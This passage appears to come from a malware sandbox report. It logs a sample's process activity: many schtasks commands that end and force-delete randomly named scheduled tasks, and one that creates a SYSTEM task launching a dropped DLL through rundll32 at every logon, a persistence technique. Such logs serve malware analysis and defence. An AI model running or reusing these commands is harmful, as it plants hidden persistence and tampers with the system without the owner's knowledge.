C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR2"
2⤵
PID:3932

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "lAtvBWBhjAuAUSkhaQr"
2⤵
PID:4492

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr"
2⤵
PID:2604

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "lAtvBWBhjAuAUSkhaQr2"
2⤵
PID:1300

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr2"
2⤵
PID:116

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JknGisNDLGEJSyipVcP"
2⤵
PID:4080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP"
2⤵
PID:1560

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JknGisNDLGEJSyipVcP2"
2⤵
PID:1420

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP2"
2⤵
PID:3228

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YymCzRAEFuptGYVgYyY"
2⤵
PID:2256

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY"
2⤵
PID:2564

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YymCzRAEFuptGYVgYyY2"
2⤵
PID:4348

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY2"
2⤵
PID:2708

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "axFcpconfnvMPcfoPBw"
2⤵
PID:3812

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw"
2⤵
PID:4548

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "axFcpconfnvMPcfoPBw2"
2⤵
PID:2860

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw2"
2⤵
PID:4740

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TbObhCfvGhvWYtTlxMQ"
2⤵
PID:3120

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ"
2⤵
PID:2284

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TbObhCfvGhvWYtTlxMQ2"
2⤵
PID:4952

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ2"
2⤵
PID:2516

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pmOjfgpJgprtFswRBIC"
2⤵
PID:1400

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC"
2⤵
PID:3300

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pmOjfgpJgprtFswRBIC2"
2⤵
PID:1220

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC2"
2⤵
PID:1624

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JtXAmmmjhUPKgDhgNcr"
2⤵
PID:5028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr"
2⤵
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JtXAmmmjhUPKgDhgNcr2"
2⤵
PID:3028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr2"
2⤵
PID:228

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nBvEvDWPBldxaKpKfqN"
2⤵
PID:4796

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN"
2⤵
PID:3644

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nBvEvDWPBldxaKpKfqN2"
2⤵
PID:2000

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN2"
2⤵
PID:456

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jzhFTGrHTBEHdwhDlHk"
2⤵
PID:4156

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk"
2⤵
PID:764

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jzhFTGrHTBEHdwhDlHk2"
2⤵
PID:4252

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jzhFTGrHTBEHdwhDlHk2"
2⤵
PID:2032

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DhjJYrdSzhVIWJoLuaT"
2⤵
PID:1056

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT"
2⤵
PID:4440

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DhjJYrdSzhVIWJoLuaT2"
2⤵
PID:5092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DhjJYrdSzhVIWJoLuaT2"
2⤵
PID:540

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "EEmPqVqEkOrqytjIixi"
2⤵
PID:640

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi"
2⤵
PID:1384

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "EEmPqVqEkOrqytjIixi2"
2⤵
PID:3092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "EEmPqVqEkOrqytjIixi2"
2⤵
PID:2192

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DuQhIaNDUkixqBSFQah"
2⤵
PID:4396

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah"
2⤵
PID:3732

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "DuQhIaNDUkixqBSFQah2"
2⤵
PID:2116

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "DuQhIaNDUkixqBSFQah2"
2⤵
PID:1108

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XOocscxzenxPQcbeNoc"
2⤵
PID:1748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc"
2⤵
PID:2468

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XOocscxzenxPQcbeNoc2"
2⤵
PID:4208

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XOocscxzenxPQcbeNoc2"
2⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "CpcpIyQZEHEGDGaVcoP"
2⤵
PID:748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP"
2⤵
PID:4852

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "CpcpIyQZEHEGDGaVcoP2"
2⤵
PID:4480

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "CpcpIyQZEHEGDGaVcoP2"
2⤵
PID:5044

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TEwqxUjyIqmpTYSBiqY"
2⤵
PID:1148

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY"
2⤵
PID:2252

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "TEwqxUjyIqmpTYSBiqY2"
2⤵
PID:2664

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "TEwqxUjyIqmpTYSBiqY2"
2⤵
PID:4908

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dcKGwvyalvyuxhUFuri"
2⤵
PID:4512

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri"
2⤵
PID:1184

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dcKGwvyalvyuxhUFuri2"
2⤵
PID:4424

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dcKGwvyalvyuxhUFuri2"
2⤵
PID:3396

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LjPBjCkxU\cbriGN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RqexYqdylWmHLyb" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4880

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ODelVPTMCGECKgw"
2⤵
PID:2544

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ODelVPTMCGECKgw"
2⤵
PID:2520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ODelVPTMCGECKgw2"
2⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ODelVPTMCGECKgw2"
2⤵
PID:2440

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "NuQkbDOvmjzyikR"
2⤵
PID:3088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "NuQkbDOvmjzyikR"
2⤵
PID:4388

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "NuQkbDOvmjzyikR2"
2⤵
PID:4828

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "NuQkbDOvmjzyikR2"
2⤵
PID:1208

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PVbqEphBRhdhSar"
2⤵
PID:3784

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PVbqEphBRhdhSar"
2⤵
PID:3932

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "PVbqEphBRhdhSar2"
2⤵
PID:2312

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "PVbqEphBRhdhSar2"
2⤵
PID:928

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rXnzilGmloByZja"
2⤵
PID:748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rXnzilGmloByZja"
2⤵
PID:4080

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rXnzilGmloByZja2"
2⤵
PID:1560

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rXnzilGmloByZja2"
2⤵
PID:5044

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OrQOZlNdkHouDfl"
2⤵
PID:3228

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OrQOZlNdkHouDfl"
2⤵
PID:4416

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OrQOZlNdkHouDfl2"
2⤵
PID:4992

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OrQOZlNdkHouDfl2"
2⤵
PID:4188

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MPBTKOKNGQXdpYB"
2⤵
PID:4960

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MPBTKOKNGQXdpYB"
2⤵
PID:4220

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "MPBTKOKNGQXdpYB2"
2⤵
PID:3772

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MPBTKOKNGQXdpYB2"
2⤵
PID:2584

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oHFOlowMWYvVWRa"
2⤵
PID:540

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oHFOlowMWYvVWRa"
2⤵
PID:4020

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oHFOlowMWYvVWRa2"
2⤵
PID:4308

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oHFOlowMWYvVWRa2"
2⤵
PID:3940

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZhEuxlviVGbffes"
2⤵
PID:1396

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZhEuxlviVGbffes"
2⤵
PID:4520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZhEuxlviVGbffes2"
2⤵
PID:1044

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZhEuxlviVGbffes2"
2⤵
PID:1640

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BzuHQmwIdSJdkMh"
2⤵
PID:4672

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BzuHQmwIdSJdkMh"
2⤵
PID:464

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BzuHQmwIdSJdkMh2"
2⤵
PID:4320

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BzuHQmwIdSJdkMh2"
2⤵
PID:3152

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BrpDRukwPjenXAP"
2⤵
PID:3520

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BrpDRukwPjenXAP"
2⤵
PID:4124

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BrpDRukwPjenXAP2"
2⤵
PID:3644

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BrpDRukwPjenXAP2"
2⤵
PID:4584

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sgHQxILjtpUwkEl"
2⤵
PID:2100

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sgHQxILjtpUwkEl"
2⤵
PID:1152

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sgHQxILjtpUwkEl2"
2⤵
PID:2736

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sgHQxILjtpUwkEl2"
2⤵
PID:1440

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rOlVqeNcMNUSjbL"
2⤵
PID:3864

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rOlVqeNcMNUSjbL"
2⤵
PID:1900

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "rOlVqeNcMNUSjbL2"
2⤵
PID:1080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rOlVqeNcMNUSjbL2"
2⤵
PID:4036

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vzkuwrRCcPzOovd"
2⤵
PID:4680

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vzkuwrRCcPzOovd"
2⤵
PID:400

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vzkuwrRCcPzOovd2"
2⤵
PID:4040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vzkuwrRCcPzOovd2"
2⤵
PID:3092

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JciSvjuACFCpPuk"
2⤵
PID:4948

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JciSvjuACFCpPuk"
2⤵
PID:5056

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JciSvjuACFCpPuk2"
2⤵
PID:1200

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "JciSvjuACFCpPuk2"
2⤵
PID:384

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "RvLAFMCfsYAmjBx"
2⤵
PID:752

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "RvLAFMCfsYAmjBx"
2⤵
PID:1708

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "RvLAFMCfsYAmjBx2"
2⤵
PID:4492

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "RvLAFMCfsYAmjBx2"
2⤵
PID:4320

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "xnzNwjgxPIMAgxD"
2⤵
PID:1792

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "xnzNwjgxPIMAgxD"
2⤵
PID:3520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "xnzNwjgxPIMAgxD2"
2⤵
PID:4852

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "xnzNwjgxPIMAgxD2"
2⤵
PID:3644

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "upvCizsQstLVhTX"
2⤵
PID:3076

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "upvCizsQstLVhTX"
2⤵
PID:3728

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "upvCizsQstLVhTX2"
2⤵
PID:3416

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "upvCizsQstLVhTX2"
2⤵
PID:2736

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sebDCftpEoxQGwR"
2⤵
PID:1440

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sebDCftpEoxQGwR"
2⤵
PID:2976

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "sebDCftpEoxQGwR2"
2⤵
PID:4884

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sebDCftpEoxQGwR2"
2⤵
PID:4440

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kGGYvMdxzKuBmUA"
2⤵
PID:4456

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kGGYvMdxzKuBmUA"
2⤵
PID:4880

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kGGYvMdxzKuBmUA2"
2⤵
PID:2544

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kGGYvMdxzKuBmUA2"
2⤵
PID:4040

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "VlcqrMUnqCdtcYE"
2⤵
PID:1160

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "VlcqrMUnqCdtcYE"
2⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "VlcqrMUnqCdtcYE2"
2⤵
PID:5040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "VlcqrMUnqCdtcYE2"
2⤵
PID:3732

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "yyQridzVWXzzcT"
2⤵
PID:1220

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "yyQridzVWXzzcT"
2⤵
PID:752

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FCfOZWamfTDXrH"
2⤵
PID:4672

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FCfOZWamfTDXrH"
2⤵
PID:464

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pvGIKDreVSBaRR"
2⤵
PID:3932

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pvGIKDreVSBaRR"
2⤵
PID:3028

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jIbkXIHNAklabT"
2⤵
PID:748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jIbkXIHNAklabT"
2⤵
PID:3020

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nfEzZvDJpGIxHg"
2⤵
PID:5032

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nfEzZvDJpGIxHg"
2⤵
PID:3076

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ExPuUBSIqiUvrE"
2⤵
PID:2572

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ExPuUBSIqiUvrE"
2⤵
PID:3416

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "nGHNjHLpNVwfpH"
2⤵
PID:3164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nGHNjHLpNVwfpH"
2⤵
PID:4500

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "szhqlLvvAtuMdL"
2⤵
PID:3372

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "szhqlLvvAtuMdL"
2⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "UChhjnNtERVtch"
2⤵
PID:3772

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "UChhjnNtERVtch"
2⤵
PID:3332

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "SvPmLaFiyNhJEE"
2⤵
PID:4744

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "SvPmLaFiyNhJEE"
2⤵
PID:4880

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XtUsujuJqCIjis"
2⤵
PID:2544

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XtUsujuJqCIjis"
2⤵
PID:2520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "mmnKyFwKoxWldP"
2⤵
PID:2028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "mmnKyFwKoxWldP"
2⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YIRiNcmpuGXKMp"
2⤵
PID:5040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YIRiNcmpuGXKMp"
2⤵
PID:4024

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dOGQydlyhLHPZb"
2⤵
PID:724

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dOGQydlyhLHPZb"
2⤵
PID:4208

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bUqXeDfXwDeSyh"
2⤵
PID:4672

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bUqXeDfXwDeSyh"
2⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "kFksENUvgeEftn"
2⤵
PID:4268

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "kFksENUvgeEftn"
2⤵
PID:228

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "WeIhAxgzFxFdin"
2⤵
PID:748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "WeIhAxgzFxFdin"
2⤵
PID:3368

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pSvwJbqBxDXeSH"
2⤵
PID:264

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pSvwJbqBxDXeSH"
2⤵
PID:1628

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "AWsjqmbGbjSzjt"
2⤵
PID:5036

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "AWsjqmbGbjSzjt"
2⤵
PID:4184

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "WIZvCLhyiJeIYW"
2⤵
PID:4188

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "WIZvCLhyiJeIYW"
2⤵
PID:4500

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hvhndarYUHapy"
2⤵
PID:5104

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hvhndarYUHapy"
2⤵
PID:3652

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "hvhndarYUHapy2"
2⤵
PID:2360

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hvhndarYUHapy2"
2⤵
PID:4456

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vYnQEgzpFpMeU"
2⤵
PID:4340

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vYnQEgzpFpMeU"
2⤵
PID:4880

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vYnQEgzpFpMeU2"
2⤵
PID:3092

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vYnQEgzpFpMeU2"
2⤵
PID:4336

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eLcVqmXNBWwuu"
2⤵
PID:1372

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eLcVqmXNBWwuu"
2⤵
PID:3300

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eLcVqmXNBWwuu2"
2⤵
PID:5040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eLcVqmXNBWwuu2"
2⤵
PID:1208

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZmZKbjdnaUYqy"
2⤵
PID:3996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZmZKbjdnaUYqy"
2⤵
PID:3056

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ZmZKbjdnaUYqy2"
2⤵
PID:1288

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZmZKbjdnaUYqy2"
2⤵
PID:3580

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pSdZUpBHWsjUN"
2⤵
PID:4980

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pSdZUpBHWsjUN"
2⤵
PID:228

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pSdZUpBHWsjUN2"
2⤵
PID:748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pSdZUpBHWsjUN2"
2⤵
PID:5044

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BDTQSCAhuviSt"
2⤵
PID:4156

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BDTQSCAhuviSt"
2⤵
PID:1628

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "BDTQSCAhuviSt2"
2⤵
PID:2564

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BDTQSCAhuviSt2"
2⤵
PID:4252

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bnDdviFrBdSHm"
2⤵
PID:3256

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bnDdviFrBdSHm"
2⤵
PID:4908

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "bnDdviFrBdSHm2"
2⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bnDdviFrBdSHm2"
2⤵
PID:1556

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oqzeCtSumDxKN"
2⤵
PID:4804

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oqzeCtSumDxKN"
2⤵
PID:4740

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oqzeCtSumDxKN2"
2⤵
PID:3352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oqzeCtSumDxKN2"
2⤵
PID:4396

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oRWdzfOuEBFOt"
2⤵
PID:3940

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oRWdzfOuEBFOt"
2⤵
PID:2116

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "oRWdzfOuEBFOt2"
2⤵
PID:1652

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "oRWdzfOuEBFOt2"
2⤵
PID:1584

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "SqVkWMCzQJLkq"
2⤵
PID:5088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "SqVkWMCzQJLkq"
2⤵
PID:752

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "SqVkWMCzQJLkq2"
2⤵
PID:3612

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "SqVkWMCzQJLkq2"
2⤵
PID:4672

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pepCFjUQgLQiC"
2⤵
PID:1288

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pepCFjUQgLQiC"
2⤵
PID:3520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pepCFjUQgLQiC2"
2⤵
PID:4080

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pepCFjUQgLQiC2"
2⤵
PID:3872

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uHiXiVeYNhlEV"
2⤵
PID:5032

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uHiXiVeYNhlEV"
2⤵
PID:264

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "uHiXiVeYNhlEV2"
2⤵
PID:3728

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "uHiXiVeYNhlEV2"
2⤵
PID:2572

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XzgsIWcHHmecE"
2⤵
PID:3220

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XzgsIWcHHmecE"
2⤵
PID:1184

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "XzgsIWcHHmecE2"
2⤵
PID:2880

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XzgsIWcHHmecE2"
2⤵
PID:4948

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YAjsxgSIQquBU"
2⤵
PID:4776

C:\Windows\SysWOW64\schtasks.exe
